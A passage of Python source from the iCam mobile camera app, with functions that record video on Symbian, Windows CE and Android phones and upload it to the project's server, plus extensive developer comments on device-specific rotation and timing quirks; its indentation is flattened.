observer's MvruoEvent() function. Again, as in the video player,
this function's usage is not defined by the video player utility
and thus a video controller supplier may use it to return
manufacturer-specific information. The event is returned as a
TMMFEvent, which contains a UID specifying an event type and an
error code."
//takephoto.cpp:
void CVideoCamera::MvruoEvent(const TMMFEvent &aEvent) {
// XXX modify the callback as there are not enough parameters
// this will not show properly to the Python layer
if(iCallbackSet)
iCallMe.VideoCameraEvent(aEvent.iErrorCode, aEvent.iEventType.iUid);
}
void CVideoCamera::MvruoOpenComplete(TInt aError) {
iCallMe.VideoCameraEvent(aError, CVideoCamera::EOpenComplete);
...
}
void CVideoCamera::MvruoPrepareComplete(TInt aError) {
iCallMe.VideoCameraEvent(aError, CVideoCamera::EPrepareComplete);
...
}
void CVideoCamera::MvruoRecordComplete(TInt aError) {
iCallMe.VideoCameraEvent(aError, CVideoCamera::ERecordComplete);
}
//cameramodule.h
enum TObserverEvents
{
EOpenComplete = 0xFA0,
EPrepareComplete,
ERecordComplete
};
and camera.py:
EOpenComplete=_camera.EOpenComplete
EPrepareComplete=_camera.EPrepareComplete
ERecordComplete=_camera.ERecordComplete
"""
DebugPrint("VideoRecordCallback(): at %s we have errorCode = %d, " \
"eventType = %d." % \
(GetCurrentDateTimeStringWithMilliseconds(),
errorCode, eventType))
"""
This callback gets invoked first with eventType = camera.EOpenComplete,
after 145-360ms after start_record().
Finished prepare for video recording, now ready to record (I guess this
is equivalent to the red light turning on at least on N95 and N82).
"""
if eventType == camera.EPrepareComplete:
global videoRecordStartTime, numFrames
# GetCurrentDateTimeStringWithMilliseconds()
videoRecordStartTime = GetTime()
numFrames = 0
videoLock.signal()
def SetViewFinderSizeForVideoRecording(cameraId):
global viewFinderSize, localVideoMode
global deviceId
if localVideoMode[cameraId][0][0] >= 320:
# viewFinderSize = (320, 240)
if SYMBIAN_S60_2ND_ED:
"""
We should not get here, since the max video resolution on S60 2nd
edition is 176x144.
"""
viewFinderSize = (176, 144)
elif SYMBIAN_S60_3RD_ED:
# viewFinderSize = (245, 200)
viewFinderSize = (220, 180)
else:
# This is conserving aspect ratio for (320, 240), as for (176, 144)
viewFinderSize = (293, 240)
else:
"""
On my E7, if we use a viewfinder with size 176x144 then when it starts
recording some STRANGE green lines appear and the phone might crash...
"""
# if deviceId == IMEI_E7:
if SYMBIAN_3:
#This is conserving aspect ratio for (320, 240), as for (176, 144).
viewFinderSize = (293, 240)
else:
# viewFinderSize = (320, 240)
viewFinderSize = localVideoMode[cameraId][0]
"""
To avoid the movies to be recorded rotated (e.g., you keep the phone in
"landscape" mode and you record with the Main camera and when you look on
the viewer application you see the movie is rotate by 90 degrees)
YOU HAVE TO specify on your phone to rotate its display along with the
phone. This can be achieved (at least on S60 3rd edition phones) by going
at Tools\Settings\General\Personalization\Display\Rotate screen and
choosing Automatic.
See weekly snippets:
Nov 6, 2010
finally realized that the rotation of videos (on S60 3rd edition) is
caused indeed by the fact iCam is minimized and another app with
portrait orientation is displayed. I have 2 solutions:
* I make sure the other app that is maximized is in landscape orientation
- but what do we do in this case if we take photos/movies with the
Front camera?
o another solution is to lock the orientation in landscape for
all processes (maybe this is useful
http://wiki.forum.nokia.com/index.php/CS001517_-_Lock_application_orientation_in_Qt_for_Symbian ).
* this is the best solution, but hardest I guess: don't maximize the
ReV_Watchdog - it happens because of the console watchdog.
* for photos the situation is even worse: without any orientation
(nor application) changes N82 takes randomly photos well or
rotated. N95 as well
(see Z:\1PhD\ReVival\Logs\NokiaN95\279\Media\):
although I start in landscape mode, camera reports max res of
(1600, 1200), so I tell it to take photos only at this
resolution - first 2 photos are actually taken at 2592x1944 and
then the following are taken rotated at 1600x1200
(the right res).
* also, N95 video records at 176x144 at smaller viewfield than photo
Nov 16, 2010
since I saw yesterday (in src\ext\amaretto\camera\src\cameramodule.cpp,
at cam_take_photo()) that the camera is re-initializatied at every
camera.take_photo(), it implies that starting the viewfinder is not
really the thing required to take photos at max resolution and
angular view. But it is actually the backlight_on parameter set to
True given to start_finder() that makes all the differences - but
in fact this translates just to e32.reset_inactivity(). So we only
need to be in landscape mode (and it is not necessary to have iCam
focused and) give e32.reset_inactivity() before take_photo() to
take photos at max resolution and angular view. This is more
desirable than starting the ViewFinder because: it takes less time,
uses less the shutter, and also has less chances to give
KErrAlreadyExists. Also, the issue is that the Power Manager is
invariably in Portrait mode, so when it kicks in
(for pauseInterval >= 1 min, usually)
"""
def VideoRecordAndUpload_S60_Before(cameraId):
# if phoneModel in ["Nokia6120", "NokiaN95", "NokiaN82"]:
if orientationForThisPhoneModel == "landscape":
isBackLightOn = True
else:
isBackLightOn = False
"""
We have observed on "landscape"-mode-phones that the screen saver
(which is INVARIABLY in Portrait mode) can mess up the video
recordings making them rotated (as in Portrait mode). This is why
we give e32.reset_inactivity() and also e32.ao_sleep(), to make
sure we get out of the screen saver mode before the viewfinder
starts (which is used by the recording).
"""
try:
"""
!!!!Maybe optimize a bit for the case if (cameraId == 1): - we can
PROBABLY take into consideration the fact the screen saver is
in Portrait mode so we don't need this extra
e32.reset_inactivity() and e32.ao_sleep(). But what if we are
not in screen saver mode? :))
"""
e32.reset_inactivity()
"""
In case the power saver is started we leave a few seconds for S60
to get out of the screen saver mode - sometimes it takes
longer.
"""
e32.ao_sleep(3)
"""
if (cameraId == 0) and camera2IsImported:
# IMPORTANT: AT THE END OF THE RECORD WE MAKE
# viewFinderSize = VIEWFINDER_SIZE_ORIG - SEE BELOW,
# IN FINALLY.
viewFinderSize = (320, 240) #(293, 240)
else:
# IMPORTANT: AT THE END OF THE RECORD WE MAKE
# viewFinderSize = VIEWFINDER_SIZE_ORIG - SEE BELOW,
# IN FINALLY.
viewFinderSize = (176, 144) #(293, 240)
"""
SetViewFinderSizeForVideoRecording(cameraId)
# StartViewFinderForCamera(cameraId, isBackLightOn, True)
StartViewFinderForCamera(cameraId, isBackLightOn, False)
e32.reset_inactivity()
# When iCam is not the main app, video recs are rotated.
# e32.ao_sleep(3)
# Generated 1 rotated out of 16
# e32.ao_sleep(2)
e32.ao_yield()
# e32.ao_sleep(4)
# e32.ao_sleep(5)
"""
We have to make sure (for ex on Nokia 6120) that the viewfinder
is started if we want to get visual info in the video recorded.
"""
e32.ao_sleep(2)
e32.reset_inactivity()
except:
DebugPrintErrorTrace()
def VideoRecordAndUpload_S60(cameraId, recordDuration, videoFileName, \
videoPathFileName):
global viewFinderSize
global videoLock
try:
"""
Requires backslashes, otherwise camera.start_record() does not
create any file.
"""
videoPathFileNameWithBackslashes = \
videoPathFileName.replace("/", "\\")
if (cameraId == 0) and camera2IsImported:
"""
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback,
# frameSize = localVideoMode[cameraId][0]) #size = (320, 240))
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, format="YUV420p",
# frameSize=localVideoMode[cameraId][0], frameRate=15.0,
# videoType="", audioEnabled=videoAudioEnabled)
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, format="YUV420p",
# frameSize=localVideoMode[cameraId][0],
# frameRate=localVideoMode[cameraId][1], videoType="",
# audioEnabled = videoAudioEnabled)
# At least on Nokia E7, to be able to record at 320x240, you
# need to specify in camera2.start_record() a
# videoType="video/mp4v-es; profile-level-id=3" (or 4)
# (videoType="" will record at 176x144).
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, format="YUV420p",
# frameSize=localVideoMode[cameraId][0],
# frameRate=localVideoMode[cameraId][1],
# videoType="video/mp4v-es; profile-level-id=3",
# audioEnabled=videoAudioEnabled)
# Good:
# This allows recording on N82 320x240x30fps and 640x480x30fps.
"""
camera.start_record(
videoPathFileNameWithBackslashes, VideoRecordCallback,
format="EFormatYUV420Planar",
frameSize=localVideoMode[cameraId][0],
frameRate=localVideoMode[cameraId][1],
videoType="video/mp4v-es; profile-level-id=4",
audioEnabled=videoAudioEnabled
)
# Here we try Night scene mode.
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, format="EFormatYUV420Planar",
# frameSize=localVideoMode[cameraId][0], frameRate=0.0,
# videoType="video/mp4v-es; profile-level-id=4",
# audioEnabled=videoAudioEnabled)
"""
# Bypassing checks for size supported, etc:
# This one doesn't work because size 1280, 720 is reported as
# not being supported - so need to bypass the checks:
# camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, format="EFormatYUV420Planar",
# frameSize=(1280, 720), frameRate=25.0,
# videoType="video/H264; profile-level-id=42801F",
# audioEnabled=videoAudioEnabled) # bitrate = 5000000 .
# Maybe try format = "EFormatEncodedH264",
# I was able to record with this on E7 at 1280x720 at 15 fps -
# MAYBE because KMMFVariableVideoBitRate, and AltoRetrato
# says that we need to use fixed bitrate (e.g., 5000000)
#camera._my_video.start_record(camera._handle(),
# unicode(videoPathFileNameWithBackslashes),
# VideoRecordCallback, (1280, 720),
# camera.formatMap["EFormatYUV420Planar"], 25.0,
# "video/H264; profile-level-id=42801F", True)
# I was able to record with this on E7 at 1280x720 at 15 fps -
# probably because KMMFVariableVideoBitRate, and AltoRetrato
# says that we need to use fixed bitrate (e.g., 5000000).
camera._my_video.start_record(camera._handle(),
unicode(videoPathFileNameWithBackslashes),
VideoRecordCallback, (1280, 720),
camera.formatMap["EFormatEncodedH264"], 25.0,
"video/H264; profile-level-id=42801F", True)
"""
else:
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, size = (640, 480)) #, fps = 15.0)
camera.start_record(videoPathFileNameWithBackslashes,
VideoRecordCallback)
"""
Preparing for video record might take, in some cases, even seconds,
so we wait for notification that it is ready:
"""
videoLock.wait()
e32.ao_sleep(recordDuration)
"""
If I use after it might give strange results - can record for
much longer than wanted (e.g., 1:30 min instead of 15 secs) -
is it maybe because of the petting that writes a file on D: ?
#SleepAndPetWatchdog(recordDuration)
#global myTimer
#myTimer.after(recordDuration, camera.stop_record)
"""
"""
This operation takes time: it finishes the compression and saves
the data on card.
"""
camera.stop_record()
# camera.stop_finder()
global videoRecordStartTime
videoRecordStartTime = -1
"""
StopViewFinderForCameraCallable comes after
videoRecordStartTime = -1 because we need this value to update
properly the ViewFinder section of the menu.
"""
# StopViewFinderForCameraCallable(False)
StopViewFinderForCameraCallable(True)
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
"""
UploadGZippedData(deviceId, "Exception in " \
"VideoRecordAndUpload(%d) with videoFileName = %s: " \
"details: free_ram = %d. %s.\n" \
% (cameraId, videoFileName, GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)) ),
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
# traceback.print_exc()
"""
errorStr = "VideoRecordAndUpload_S60(%d) with videoFileName %s " \
"(free_ram = %d) returned exception %s. " \
"Bailing out..." % \
(cameraId, videoFileName, GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
if MY_DEBUG_STDERR:
sys.stderr.write(" " + errorStr + "\n")
DebugPrintErrorTrace()
"""
viewFinderSize = VIEWFINDER_SIZE_ORIG
# Even if we give return, finally is sill executed before returning
# from this function.
return
"""
"""
# !!!!This finally doesn't work on PyS60 1.4.5 (Python 2.2) - WHY?!!!!
finally:
viewFinderSize = VIEWFINDER_SIZE_ORIG
"""
viewFinderSize = VIEWFINDER_SIZE_ORIG
def VideoRecordAndUpload_WinCE(cameraId, recordDuration, \
videoFileName, videoPathFileName):
# if accessPointName == u"":
# print "VideoRecordAndUpload(): Not uploading movie."
# return
"""
if os.path.isfile(videoPathFileName):
os.unlink(videoPathFileName)
# It takes between 1:30 - 5 minutes on HTC Touch Cruise to encode the
# video to .asf ... :)
WinSpawn(r"\Storage Card\iCam\video_rec_mute_30sec_ASF_and_exit.exe",
[])
"""
# Calling the Camera.exe application directly :)
# Doesn't work
# WinSpawn(r"\Storage Card\iCam\TimeLapsePhotos.mscr", [])
# The MortScript (.mscr) doesn't work well when called from iCam.py -
# the Sleep() in .mscr works incorrectly (usually sleeps very little
# - ~nothing for 30 secs, etc).
#WinSpawn(r"\Storage Card\iCam\CamAuto.exe", [])
# Camera.exe application runs in a separate process.
# Finding the most recent video.
try:
actualFileName = None
pathFolderName = WINCE_MEDIA_FOLDER
folderContent = os.listdir(pathFolderName)
"""
Use reverse = False to send first the oldest ones (like this you
send in chronological order). Use reverse = True for sending
first the most recent ones.
"""
# sortedFolderContent = sorted(folderContent, reverse = False)
"""
sort() without parameters is the ONLY one that works in Python 2.2.
(Info on sort at http://wiki.python.org/moin/HowTo/Sorting/.)
"""
folderContent.sort()
sortedFolderContent = folderContent
DebugPrint("VideoRecordAndUpload_WinCE(): " \
"sortedFolderContent = %s." % sortedFolderContent)
"""
!!!!I should check for len(sortedFolderContent) > 2
"""
actualFileName = sortedFolderContent[len(sortedFolderContent) - 1]
videoPathFileName = pathFolderName + "/" + actualFileName
try:
fInput = open(videoPathFileName, "rb")
# mediaFileData = fInput.read()
fInput.close()
except:
DebugPrintErrorTrace()
"""
If I can't open the file I presume it's because the Camera app
is still recording on this file. So I use the previous
video recorded.
"""
actualFileName = \
sortedFolderContent[len(sortedFolderContent) - 2]
videoPathFileName = pathFolderName + "/" + actualFileName
if actualFileName.find("VIDEO") == -1:
return
"""
else:
# !!!!We assume this is the most recent movie - I should check
# after creation time.
videoPathFileName = "/Storage Card/DCIM/100MEDIA/" + \
actualFileName
for actualFileName in sortedFolderContent:
if (actualFileName.find(STDERR_FILENAME_PREFIX) != -1) or
(actualFileName.find(STDOUT_FILENAME_PREFIX) != -1):
"""
try:
if MY_DEBUG_STDOUT:
# See http://docs.python.org/library/os.path.html
# print "File was last modified (12 hour format):"
print "VideoRecordAndUpload_WinCE(): File %s has the write " \
"(last modification?) time (getmtime) %s." % \
(videoPathFileName,
time.strftime("%m/%d/%Y %I:%M:%S %p",
time.localtime(
os.path.getmtime(videoPathFileName))))
"""
NOT RELEVANT on WinCE - returns correct day, but hour is
12:00:00 AM:
print "VideoRecordAndUpload(): File %s has " \
"the last access time (getatime) %s." % \
(videoPathFileName, time.strftime(
"%m/%d/%Y %I:%M:%S %p",
time.localtime(os.path.getatime(
videoPathFileName))))
"""
print "VideoRecordAndUpload_WinCE(): File %s has the " \
"creation time (on Windows) (getctime) %s." % \
(videoPathFileName,
time.strftime("%m/%d/%Y %I:%M:%S %p",
time.localtime(os.path.getctime(
videoPathFileName))))
sys.stdout.flush()
except:
DebugPrintErrorTrace()
try:
"""
Use the modification time of the video and preserve its
extion (.mp4, .3gp, etc).
"""
videoEndTime = \
time.localtime(os.path.getmtime(videoPathFileName))
"""
See http://pleac.sourceforge.net/pleac_python/datesandtimes.html
and http://docs.python.org/library/time.html#time.strftime
for details.
"""
videoFileName = time.strftime("%Y_%m_%d_%H_%M_%S_000", \
videoEndTime) + \
"_%s_%d" % (deviceId, cameraId) + \
actualFileName[len(actualFileName) - 4:]
except:
DebugPrintErrorTrace()
except:
"""
Preserve the extention of the media file (by default it is a .3gp).
# videoFileName = videoFileName[ : len(videoFileName) - 4] +
# actualFileName[len(actualFileName) - 4 : ]
"""
DebugPrintErrorTrace()
try:
# Not sure if it requires backslashes
videoPathFileName = videoPathFileName.replace("/", "\\")
"""
We give this to allow saving completely the media file to the disk -
but maybe it is not effective.
"""
time.sleep(5.0)
except:
DebugPrintErrorTrace()
return (videoFileName, videoPathFileName, actualFileName)
def VideoRecordAndUpload_Android(cameraId, recordDuration, \
videoFileName, videoPathFileName):
try:
"""
See https://code.google.com/p/android-scripting/wiki/ApiReference#recorderCaptureVideo:
recorderCaptureVideo(String targetPath, Double duration[optional],
Boolean recordAudio[optional, default true])
"""
# myDroid.recorderCaptureVideo(videoPathFileName, recordDuration, True)
#if True:
if False:
myDroid.recorderCaptureVideo(videoPathFileName, recordDuration,
videoAudioEnabled)
else:
"""
#!!!!TODO: try out different resolutions with recorderStartVideo()
From M:\1Hg5\android-scripting\android\Common\src\com\googlecode\android_scripting\facade\MediaRecorderFacade.java
@Rpc(description = "Records video from the camera and saves it to the given location. "
+ "\nDuration specifies the maximum duration of the recording session. "
+ "\nIf duration is 0 this method will return and the recording will only be stopped "
+ "\nwhen recorderStop is called or when a scripts exits. "
+ "\nOtherwise it will block for the time period equal to the duration argument."
+ "\nvideoSize: 0=160x120, 1=320x240, 2=352x288, 3=640x480, 4=800x480.")
public void recorderStartVideo(@RpcParameter(name = "targetPath") String targetPath,
@RpcParameter(name = "duration") @RpcDefault("0") Integer duration,
@RpcParameter(name = "videoSize") @RpcDefault("1") Integer videoSize) throws Exception {
"""
myDroid.recorderStartVideo(videoPathFileName, recordDuration, 3) # 640x480
myDroid.recorderStop()
# Wait for the video to be saved before trying to send the file.
time.sleep(5.0)
except:
DebugPrintErrorTrace()
def VideoRecordAndUpload(cameraId, recordDuration):
global accessPointName #, bluetoothMode
global LOCAL_FOLDER_MEDIA_FILES, deviceId
DebugPrint("Entered VideoRecordAndUpload() at %s." % \
GetCurrentDateTimeStringNice())
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
VideoRecordAndUpload_S60_Before(cameraId)
GetGSMLocation()
# crtTime = GetCurrentDateTime()
"""
See http://pleac.sourceforge.net/pleac_python/datesandtimes.html and
http://docs.python.org/library/time.html#time.strftime for details.
"""
#videoFileName = time.strftime("%Y_%m_%d_%H_%M_%S", crtTime) + \
# ("_%d.3gp" % cameraId)
videoFileName = GetCurrentDateTimeStringWithMilliseconds() + \
"_%s_%d.3gp" % (deviceId, cameraId)
if storeLocallyMedia == 0:
if ANDROID_OS:
"""
Since we don't want to save the file on mem card, we save in
the RAM drive.
"""
videoPathFileName = "/sdcard/iCamTemp.3gp"
elif SYMBIAN_OS:
"""
Since we don't want to save the file on mem card, we save in
the RAM drive.
"""
# videoPathFileName = "D:/iCamTemp.3gp"
videoPathFileName = LOCAL_FOLDER_TEMP + "/iCamTemp.3gp"
elif WINDOWS_CE_OS_PYTHONCE:
"""
We actually do not use this value, since we should have
storeLocallyMedia == 1 (or 2).
"""
videoPathFileName = "[N/A]"
else:
videoPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + videoFileName
DebugPrint("VideoRecordAndUpload(%d) with videoFileName = %s, " \
"videoPathFileName = %s, recordDuration = %d, " \
"localVideoMode[cameraId] = %s. " % \
(cameraId, videoFileName, videoPathFileName,
recordDuration, str(localVideoMode[cameraId])) + \
GetTextForState(cameraId))
if ANDROID_OS:
VideoRecordAndUpload_Android(cameraId, recordDuration, \
videoFileName, videoPathFileName)
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
VideoRecordAndUpload_S60(cameraId, recordDuration, \
videoFileName, videoPathFileName)
elif WINDOWS_CE_OS_PYTHONCE:
(videoFileName, videoPathFileName, actualFileName) = \
VideoRecordAndUpload_WinCE( \
cameraId, recordDuration, \
videoFileName, videoPathFileName)
"""
res = UploadStateAndFileAndStoreState(deviceId, cameraId,
videoFileName, OUTPUT_VIDEO_PATH_FILENAME,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
"""
res = UploadStateAndFileAndStoreState(deviceId, cameraId,
videoFileName, videoPathFileName,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=False)
#!!!!if res == -1: return
if WINDOWS_CE_OS_PYTHONCE:
try:
if (storeLocallyMedia == 1) and (actualFileName is not None):
DebugPrint("VideoRecordAndUpload(): Moving video in %s." % \
WINCE_SENT_MEDIA_FOLDER)
if not os.path.exists(WINCE_SENT_MEDIA_FOLDER):
os.makedirs(WINCE_SENT_MEDIA_FOLDER)
MoveFileBetweenAnyDrives(videoPathFileName, \
WINCE_SENT_MEDIA_FOLDER + "/" + actualFileName)
except:
DebugPrintErrorTrace()
if storeLocallyMedia == 0:
DebugPrint("VideoRecordAndUpload(): Since storeLocallyMedia == 0, " \
"now I erase it (note that on S60 I saved the movie " \
"on D:).")
try:
if SYMBIAN_OS:
if _PyS60_1_9_OR_NEWER: #pyS60VersionNumber > 14:
mediaUploadedLock.wait()
"""
If WINDOWS_CE_OS_PYTHONCE and (res == -1) we keep the video
(normally in DCIM folder)
"""
if (WINDOWS_CE_OS_PYTHONCE == False) or \
((WINDOWS_CE_OS_PYTHONCE == True) and (res != -1)):
os.unlink(videoPathFileName)
else:
pass
except OSError:
"""
Quitting application since it might have problems with video
recorder remaining hanged.
"""
DebugPrint("VideoRecordAndUpload(): received exception of type " \
"exceptions.OSError.")
DebugPrintErrorTrace()
"""
At least my N95 with bad display gives sometimes this exception:
"OSError: [Errno 13] Permission denied: 'D:/iCamTemp.3gp'"
This exception started appearing immediately after an exception
YouTubeError:
{'status': 403, 'body': "<?xml version='1.0'
encoding='UTF-8'?><errors><error><domain>yt:quota</domain><code>too_many_recent_calls</code></error></errors>", 'reason': 'Forbidden'}
I guess this means the youtubeClient.InsertVideoEntry() doesn't
release this file, hence the exception when trying to
os.unlink() this file. Also it seems video recording
doesn't work either anymore (again probably because the
file D:/iCamTemp.3gp is still used by some thread? of
youtubeClient.InsertVideoEntry().
LESS PROBABLE: I think it has to do with the fact the video
recording seems to have some issues (I have noticed this only
on this phone) - I think what happens is that the video
recorder remains hanged and doesn't release the file
'D:/iCamTemp.3gp', hence the exception when trying to
os.unlink() this file.
"""
except:
"""
A possible solution is to use a different name than
D:/iCamTemp.3gp.:
We don't give Quit(), because this exception can be triggered by
the fact we want to upload the video to YouTube, but receive a
timeout exception and save the movie to the Unsent folder,
hence we don't have the file anymore as videoPathFileName.
"""
DebugPrintErrorTrace()
MULTITHREADED_VIDEORECORD_AND_UPLOAD = True
"""
For Symbian OS:
VF, TakePhoto, VideoRec, AudioRec.
- NOTE: .save() and .resize() can be async
Burst (Turbo) VideoRecord mode:
- accomplished by:
keeping on forever the VF
uses multithreading to do video recording of new movie and sending
the previous movie simultaneously.
The standard VideoRecordAndUpload, which is useful if we use both
cameras, does the following:
# In case the power saver is started we leave a few seconds for
# S60 to come back to landscape orientation - sometimes it
# takes longer.
e32.ao_sleep(3)
StartViewFinderForCamera
camera.stop_finder()
camera.release()
#camera._my_camera = camera._camera.Camera(cameraId)
camera.UseCamera(cameraId)
# We have to make sure (for ex on Nokia 6120) that the viewfinder
# is started if we want to get visual info in the video recorded.
e32.ao_sleep(2)
# This operation takes time: it finishes the compression and saves
# the data on card.
stop_record()
1 sec pause
As we can see we pause for 6 seconds explicitely (which are MANDATORY
TO USE TO PERFORM VIDEO RECORDING in the right orientation, etc),
and most likely 1-4 more in StartViewFinderForCamera and
stop_record().
So, in case we don't use both cameras, we should use
ContinuousVideoRecordAndUpload() since it is more efficient - fewer
operations which probably result in less mechanical stress on the
shutter and the rest opical system.
"""
def ContinuousVideoRecordAndUpload(cameraId, recordDuration):
global accessPointName #, bluetoothMode
global deviceId, viewFinderSize, videoLock
global LOCAL_FOLDER_MEDIA_FILES, LOCAL_FOLDER_UNSENT_FILES
global uploadUnsentData
uploadUnsentData = 0
"""
We save the unsent packet in the ram drive.
In fact we should not even save the Unsent packets -simply drop them maybe.
"""
# LOCAL_FOLDER_UNSENT_FILES = "D:/Unsent"
LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER_TEMP + "/Unsent"
if not os.path.exists(LOCAL_FOLDER_UNSENT_FILES):
os.makedirs(LOCAL_FOLDER_UNSENT_FILES)
DebugPrint("Entered ContinuousVideoRecordAndUpload() at %s." % \
GetCurrentDateTimeStringNice())
if SYMBIAN_OS:
if orientationForThisPhoneModel == "landscape":
#if phoneModel in ["Nokia6120", "NokiaN95", "NokiaN82"]:
isBackLightOn = True
else:
isBackLightOn = False
"""
We have observed on "landscape"-mode-phones that the screen saver
(which is INVARIABLY in Portrait mode) can mess up the video
recordings making them rotated (as in Portrait mode). This is why
we give e32.reset_inactivity() and also e32.ao_sleep(2), to make
sure we are in landscape mode before the viewfinder starts (which
is used by the recording).
"""
try:
e32.reset_inactivity()
"""
In case the power saver is started we leave a few seconds for S60
to come back to landscape orientation - sometimes it takes
longer.
"""
e32.ao_sleep(3)
"""
if (cameraId == 0) and camera2IsImported:
# IMPORTANT: AT THE END OF THE RECORD WE MAKE
# viewFinderSize = VIEWFINDER_SIZE_ORIG - SEE BELOW, I
# FINALLY.
viewFinderSize = (320, 240) #(293, 240)
else:
# IMPORTANT: AT THE END OF THE RECORD WE MAKE
# viewFinderSize = VIEWFINDER_SIZE_ORIG - SEE BELOW, IN
# FINALLY.
viewFinderSize = (176, 144) #(293, 240)
"""
SetViewFinderSizeForVideoRecording(cameraId)
# StartViewFinderForCamera(cameraId, isBackLightOn, True)
StartViewFinderForCamera(cameraId, isBackLightOn, False)
e32.reset_inactivity()
# When iCam is not the main app, video recs are rotated.
#e32.ao_sleep(3)
# Generated 1 rotated out of 16.
# e32.ao_sleep(2)
e32.ao_yield()
# e32.ao_sleep(4)
# e32.ao_sleep(5)
"""
We have to make sure (for ex on Nokia 6120) that the viewfinder is
started if we want to get visual info in the video recorded.
"""
e32.ao_sleep(2)
e32.reset_inactivity()
except:
DebugPrintErrorTrace()
GetGSMLocation()
# Nokia N82
if deviceId == IMEI_N82:
"""
LOCAL_FOLDER_AUX = "D:/iCam"
if os.path.exists(LOCAL_FOLDER_AUX) == False:
os.makedirs(LOCAL_FOLDER_AUX)
"""
LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_TEMP + "/Media"
if not os.path.exists(LOCAL_FOLDER_MEDIA_FILES):
os.makedirs(LOCAL_FOLDER_MEDIA_FILES)
counterVideoRecords = 0
while True:
NUM_VIDEO_RECORDS_BETWEEN_DOWNLOAD_COMMANDS = 2
if counterVideoRecords == 0:
hasDownloadedNewCmd = DownloadCommands()
if counterVideoRecords \
== NUM_VIDEO_RECORDS_BETWEEN_DOWNLOAD_COMMANDS - 1:
counterVideoRecords = 0
else:
counterVideoRecords += 1
#crtTime = GetCurrentDateTime()
"""
See http://pleac.sourceforge.net/pleac_python/datesandtimes.html
and http://docs.python.org/library/time.html#time.strftime
for details.
"""
#videoFileName = time.strftime("%Y_%m_%d_%H_%M_%S", crtTime) + \
# ("_%d.3gp" % cameraId)
videoFileName = GetCurrentDateTimeStringWithMilliseconds() + \
"_%s_%d.3gp" % (deviceId, cameraId)
#+ "_%d.3gp" % cameraId
if storeLocallyMedia == 0:
# Since we don't want to save the file on mem card, we save in
# the RAM drive.
#videoPathFileName = "D:/iCamTemp.3gp"
# Since we don't want to save the file on mem card, we save in
# the RAM drive.
videoPathFileName = LOCAL_FOLDER_TEMP + "/iCamTemp.3gp"
else:
videoPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + \
videoFileName
DebugPrint("ContinuousVideoRecordAndUpload(%d) with " \
"videoFileName = %s, videoPathFileName = %s, " \
"recordDuration = %d, localVideoMode[cameraId] = %s. " % \
(cameraId, videoFileName, videoPathFileName,
recordDuration, str(localVideoMode[cameraId])) + \
GetTextForState(cameraId))
#sys.stdout.flush()
try:
"""
Requires backslashes, otherwise camera.start_record() does
not create any file.
"""
videoPathFileNameWithBackslashes = \
videoPathFileName.replace("/", "\\")
if (cameraId == 0) and camera2IsImported:
"""
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback,
# size = localVideoMode[cameraId][0])
# #size = (320, 240))
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, format = "YUV420p",
# frameSize = localVideoMode[cameraId][0],
# frameRate = 15.0, videoType = "",
# audioEnabled = videoAudioEnabled)
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, size = (640, 480)) #, fps = 15.0)
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, format = "YUV420p",
# frameSize = localVideoMode[cameraId][0],
# frameRate = localVideoMode[cameraId][1],
# videoType = "", audioEnabled = videoAudioEnabled)
"""
camera.start_record(
videoPathFileNameWithBackslashes,
VideoRecordCallback,
format="EFormatYUV420Planar",
frameSize=localVideoMode[cameraId][0],
frameRate=localVideoMode[cameraId][1],
videoType="video/mp4v-es; profile-level-id=4",
audioEnabled=videoAudioEnabled
)
else:
camera.start_record(videoPathFileNameWithBackslashes,
VideoRecordCallback)
#myResult=camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, size=(320, 240)) #it returns !!!!
"""
Preparing for video record might take, in some cases, even
seconds, so we wait for notification, it is ready:
"""
videoLock.wait()
e32.ao_sleep(recordDuration)
"""
If I use after it might give strange results - can record for
much longer than wanted (e.g., 1:30 min instead of 15
secs) - is it maybe because of the petting that writes a
file on D: ?
"""
# SleepAndPetWatchdog(recordDuration)
# global myTimer
# myTimer.after(recordDuration, camera.stop_record)
DebugPrint("ContinuousVideoRecordAndUpload(): before " \
"camera.stop_record(), " \
"GetCurrentDateTimeStringWithMilliseconds() = %s." % \
GetCurrentDateTimeStringWithMilliseconds())
"""
This operation takes time: it finishes the compression and
saves the data on card.
"""
camera.stop_record()
DebugPrint("ContinuousVideoRecordAndUpload(): after " \
"camera.stop_record(), " \
"GetCurrentDateTimeStringWithMilliseconds() = %s." % \
GetCurrentDateTimeStringWithMilliseconds())
"""
camera.stop_record()
camera.stop_finder()
"""
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
"""
UploadGZippedData(deviceId, "Exception in " \
"VideoRecordAndUpload(%d) with videoFileName = %s: " \
"details: free_ram = %d. %s.\n" \
% (cameraId, videoFileName, GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)) ),
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
"""
# traceback.print_exc()
